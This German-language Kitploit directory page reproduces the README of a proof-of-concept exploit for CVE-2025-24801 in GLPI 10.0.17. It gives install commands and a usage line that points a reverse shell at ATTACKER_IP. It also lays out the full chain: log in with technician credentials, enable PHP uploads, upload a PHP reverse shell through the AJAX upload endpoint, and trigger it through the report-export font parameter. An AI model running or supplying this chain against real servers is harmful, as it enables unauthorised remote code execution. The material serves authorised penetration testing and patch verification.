Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-24801 — Proof-of-Concept-Exploit für CVE-2025-24801, eine LFI-zu-RCE-Schwachstelle in GLPI 10.0.17. Automatisiert den Login, aktiviert PHP-Uploads und lädt eine Reverse Shell für autorisierte Sicherheitstests hoch. | Kitploit
Tools/GitHubGitHub/fatkz/cve-2025-24801
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubfatkz/cve-2025-24801

CVE-2025-24801

Proof-of-Concept-Exploit für CVE-2025-24801, eine LFI-zu-RCE-Schwachstelle in GLPI 10.0.17. Automatisiert den Login, aktiviert PHP-Uploads und lädt eine Reverse Shell für autorisierte Sicherheitstests hoch.

Repository anzeigen
3111vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-24801 PoC für GLPI RCE

Dieses Repository enthält ein Proof-of-Concept-Skript (poc.py), das CVE-2025-24801 ausnutzt, eine LFI-zu-RCE-Schwachstelle in GLPI 10.0.17. Es automatisiert:

  • Anmelden bei GLPI
  • Aktivieren von .php-Uploads durch Aktualisieren der Dokumenttyp-Einstellungen
  • Hochladen einer PHP-Reverse-Shell über den AJAX-Datei-Upload-Endpunkt

🛠️ Installation

root@kitploit:~
git clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt

🚀 Verwendung

root@kitploit:~
python3 poc.py \
  --url https://target.example.com/glpi \
  --user TECHNICIAN_USER \
  --password "PASSWORD" \
  --lhost ATTACKER_IP \
  --lport 4444
  • --url: Basis-URL der GLPI-Instanz (z. B. )
https://example.com/glpi
  • --user / --password: Gültige GLPI-Techniker-Anmeldedaten
  • --lhost / --lport: Angreifer-IP und -Port für den Reverse-Shell-Listener
  • Das Skript verwendet standardmäßig automatisch --doc-id 1, um den ersten Dokumenttyp zu aktualisieren.

    Nach der Ausführung wird das Skript:

    1. Anmelden und eine Sitzung einrichten
    2. Aktivieren von .php-Uploads durch Aktualisieren der Dokumenttyp-ID 1
    3. Hochladen von exploit.php mit einem PHP-Reverse-Shell-Payload

    Sie müssen dann manuell die LFI auslösen, indem Sie den hochgeladenen Dateinamen im PDF-Schriftarteninclude angeben (z. B. über die Berichtsexportfunktion), um RCE zu erreichen.

    📑 Funktionsweise

    1. Anmeldung: Extrahiert das CSRF-Token aus /front/login.php und sendet Anmeldedaten, um sich zu authentifizieren.
    2. PHP-Uploads aktivieren: Ruft /front/documenttype.form.php?id=1 ab, parst das CSRF-Token und fügt php zu den erlaubten Erweiterungen hinzu.
    3. Shell hochladen: Ruft /front/ticket.form.php für ein CSRF-Token ab, verwendet dann /ajax/fileupload.php (mit X-Requested-With: XMLHttpRequest), um eine PHP-Reverse-Shell hochzuladen.
    4. RCE auslösen: Manuell die PDF-Schriftarten-LFI aufrufen, indem der hochgeladene Shell-Dateiname im Parameter pdffont beim Berichtsexport angegeben wird.

    ⚠️ Haftungsausschluss

    Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Verwenden Sie es nicht gegen Systeme ohne ausdrückliche Genehmigung.


    Erstellt für Bildungs- und autorisierte Pentesting-Zwecke.

    Tool herunterladen